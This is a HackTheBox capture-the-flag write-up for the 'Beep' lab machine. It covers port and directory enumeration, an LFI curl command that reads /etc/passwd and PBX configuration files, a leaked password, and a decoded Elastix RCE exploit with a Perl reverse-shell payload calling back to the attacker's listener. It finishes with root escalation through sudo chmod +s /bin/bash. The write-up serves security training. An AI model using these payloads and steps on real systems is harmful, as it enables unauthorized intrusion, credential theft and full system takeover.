HackTheBox | Beep

HackTheBox | Beep

2 months ago   •   10 min read

By 0xBEN
Table of contents

Nmap Results

NOTE: Sorry for the IP address change on the target in the middle of the write-up. I had to change VPN servers in the middle of my session.

# Nmap 7.93 scan initiated Wed Mar 29 16:34:27 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt 10.129.1.226
Nmap scan report for 10.129.1.226
Host is up (0.014s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_  2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.129.1.226/
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            938/udp   status
|_  100024  1            941/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2023-03-29T20:39:13+00:00; -1s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry 
|_/
941/tcp   open  status     1 (RPC #100024)
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4190/tcp  open  sieve?
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax?
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Device type: general purpose|media device|PBX|WAP|specialized|printer|storage-misc
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), Riverbed RiOS (94%), HP embedded (94%), Netgear embedded (94%), Osmosys embedded (93%), Thecus embedded (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/o:riverbed:rios cpe:/h:netgear:eva9100 cpe:/h:thecus:4200 cpe:/h:thecus:n5500
Aggressive OS guesses: Linux 2.6.18 (95%), Linux 2.6.27 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.30 (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%), Linux 2.6.8 (Debian 3.1) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.0.1

Host script results:
|_clock-skew: -1s

TRACEROUTE (using port 8888/tcp)
HOP RTT      ADDRESS
1   14.50 ms 10.10.14.1
2   14.64 ms 10.129.1.226

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 16:44:23 2023 -- 1 IP address (1 host up) scanned in 596.34 seconds





Service Enumeration

TCP/80 & TCP/443

Looking at the nmap output, TCP/80 redirects to TCP/443. I like to start with file and web servers, so we'll start here.

Trying to Find a Server Version

I was trying to find some clever way to get the version of Elastix by checking the source code on various pages. But, the one thing I did notice is a pattern on the files when clicking through various directories. They all have a timestamp of 01-Nov-2011, which should be the original the developers pushed with the software. The other timestamps were more on 07-Apr-2017, which I guess is when the target was created.

This page here has a limited version history for Elastix and also has a date that closely aligns with the file timestamps on the server.

DistroWatch.com: Put the fun back into computing. Use Linux, BSD.
News and feature lists of Linux and BSD distributions.

So, my best guess is that this server is running Elastix 2.2. The release announcement link on this page doesn't work, but I'd like to read it, as it may disclose other features about the app. I could probably use the Wayback Machine to find a copy of the page.

Elastix 2.2
Elastix, the Open Source Unified Communications Server.



Checking for Potential Exploits

And, it appears that there are some public exploits available for this version of Elastix as well.

Let's enumerate some more.





Gobuster Enumeration

gobuster dir -k -u https://10.129.1.226/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 50 -o gobuster.txt

/admin                (Status: 401) [Size: 2279]
/configs              (Status: 200) [Size: 1284]
/config.php           (Status: 200) [Size: 1785]
/favicon.ico          (Status: 200) [Size: 894]
/help                 (Status: 200) [Size: 346]
/images               (Status: 200) [Size: 29900]
/index.php            (Status: 200) [Size: 1785]
/lang                 (Status: 200) [Size: 4790]
/libs                 (Status: 200) [Size: 7800]
/mail                 (Status: 200) [Size: 2411]
/modules              (Status: 200) [Size: 13134]
/panel                (Status: 200) [Size: 1065]
/recordings           (Status: 200) [Size: 5194]
/register.php         (Status: 200) [Size: 1785]
/robots.txt           (Status: 200) [Size: 28]
/static               (Status: 200) [Size: 1278]
/themes               (Status: 200) [Size: 3174]
/var                  (Status: 200) [Size: 1238]





Interesting Findings

/admin

Even when not authenticated, we are redirected to this page where we can gather additional information — like FreePBX 2.8.1.4. It appears that this version of FreePBX could be vulnerable to the remote code execution flaw discovered above. There also appear to be additional public exploits available for this version of FreePBX.



/mail



TCP/10000

Gobuster Enumeration

gobuster dir -k -u https://10.129.1.226:10000 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 50 -o gobuster.txt --exclude-length 2377



TCP/5038

5038/tcp  open  asterisk   Asterisk Call Manager 1.1

Here's a fantastic write-up on pentesting the Asterisk Call Manager server:

Penetration Testing on VoIP Asterisk Server (Part 2) - Hacking Articles
In the previous article we learned about Enumeration, Information Gathering, Call Spoofing. We introduced a little about the Asterisk Server. This time we will focus

Nothing too promising in the way of public exploits for this version of Asterisk.





Exploit

Unauthenticated RCE

Understanding the Exploit

searchsploit -m 18650
Copy the exploit to the current directory

Let's inspect the exploit to understand more about how it works.

  1. This exploit works by crafting a specific URL to the Elastix server's /recordings/misc/callme_page.php script — which is a FreePBX integration with Elastix.
  2. Let's decode the URL to make it easier to read (the line breaks in the URL are intended):
https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'+str(lhost)+':'+str(lport)+'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

  1. Looking at the technical write-up, the vulnerability occurs due to failure to sanitize user input on the "To" parameter.

    The $to paramteter in recordings/misc/callmepage.php does not get sanitized. After a short trip in between various functions, $to ends up written to the Asterisk Management Interface socket.

  2. This causes the attacker-controllerd input to be passed to the socket on the operating system where arbitray commands can be executed. In the case of this exploit, a perl command is being executed to create a reverse shell back to the attacker's machine.

  3. In the case of this exploit, we need to update these values:

rhost="target-ip-here"
lhost="htb-vpn-ip-here"
lport=listener-port-here
extension="user-extension-here"





More Enumeration

We're not quite ready to run the exploit yet, as we don't have a valid user extension. We can use the Local File Inclusion exploit to try and find more information, like usernames, credentials, and/or configuration files.

searchsploit -m 37637
Copy the LFI exploit to your current directory

Let's take a look at the exploit to understand how it works. It looks like there is a PHP script that has an unsanitized parameter where an attacker can control the input by passing in a directory traversal payload and a null-byte terminator to cause the script to parse the input.

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
POC from the script

We actually don't need the Perl script to run this exploit and can easily do this using curl.

curl -ks 'https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../etc/passwd%00&module=Account&action'
Read '/etc/passwd' from the target via LFI

Here is a fantastic list of various configuration files that we could try and read for some sensitive information.

Asterisk Configuration files - PBX in a Flash for Newbies
This is a How To site documenting configuration procedures and tips for beginner Asterisk PBX users. It concentrates on the PBX in a Flash distribution using FreePBX as the web based administration tool. It is targeted to the non telecom crowd who hasn’t learned the telecom lingo and finds the basi…

I think some good files to check out would be:

  • /etc/passwd
  • /etc/amportal.conf
  • /etc/asterisk/cdr_mysql.conf
  • /etc/asterisk/manager.conf
  • /etc/asterisk/voicemail.conf

After checking through some of the above files, we have some good information to go with:

  • Linux user: fanis at /home/fanis
  • The password, jEhdIekWmdjE is repeated across multiple configuration files for various user accounts like admin, asteriskuser
  • Looking at the voicemail configuration, Fanis has an extension of 233





Testing Credentials and Running the Exploit

Using the credentials admin:jEhdIekWmdjE, I was able to log into the Elastix admin portal. So, let's hang onto those credentials for further enumeration in the post-exploitation phase.

Remember that we needed a valid user extension for the public exploit. We were able to enumerate that using the LFI. So, let's update the exploit using the information at our disposal.

rhost="10.10.10.7"
lhost"10.10.14.13"
lport=443
extension="233"

sudo rlwrap nc -lnvp 443
Start a listener using the matching port from the exploit
python2 18650.py
Run the exploit





Post-Exploit Enumeration

Current User

Click to expand
uid=100(asterisk) gid=101(asterisk)

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper



OS & Kernel

Click to expand
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 i686 i386 GNU/Linux
    
CentOS release 5.6 (Final)



Users

Click to expand
fanis:x:501:501::/home/fanis:/bin/bash



Groups

Click to expand
fanis:x:501:



Network

Interfaces
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:b9:18:45 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.7/24 brd 10.10.10.255 scope global eth0


ARP Table
N/A


Routes
N/A


Open Ports
tcp        0      0 127.0.0.1:20004             0.0.0.0:*                   LISTEN      -


Ping Sweep
N/A



Processes

Click to expand
root      3130  0.0  0.1   4636  1284 ?        S    Mar31   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --user=mysql
root      3754  0.0  1.3  19264 13660 ?        Ss   Mar31   0:00 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf



Services

Click to expand
No interesting services.



Scheduled Tasks

Click to expand
2 * * * * /var/lib/asterisk/bin/freepbx-cron-scheduler.php

- Current user crontab, no globally readable cron jobs





Privilege Escalation

Looking at the output from sudo -l as the user, asterisk, there are multiple ways we could elevate our privilege. The asterisk user has password-less sudo as the root user on multiple binaries; the most dangerous of which being chown and chmod.

sudo chmod +s /bin/bash
Add the sticky bit to '/bin/bash'

This will work, because /bin/bash is a binary and root is the owner of this binary. Adding the sticky bit to this binary will cause us to run it as if we are root. So, we can spawn an interactive bash sub-process and inherit the root user's permissions while doing so.

/bin/bash -ip
Launch an interactive bash subprocess and inherit permissions





Flags

User
2a3072eb60a0118b2ef1d4b4a721475d


Root
79692c78562baf08548e76737d28fc0b

Spread the word

Keep reading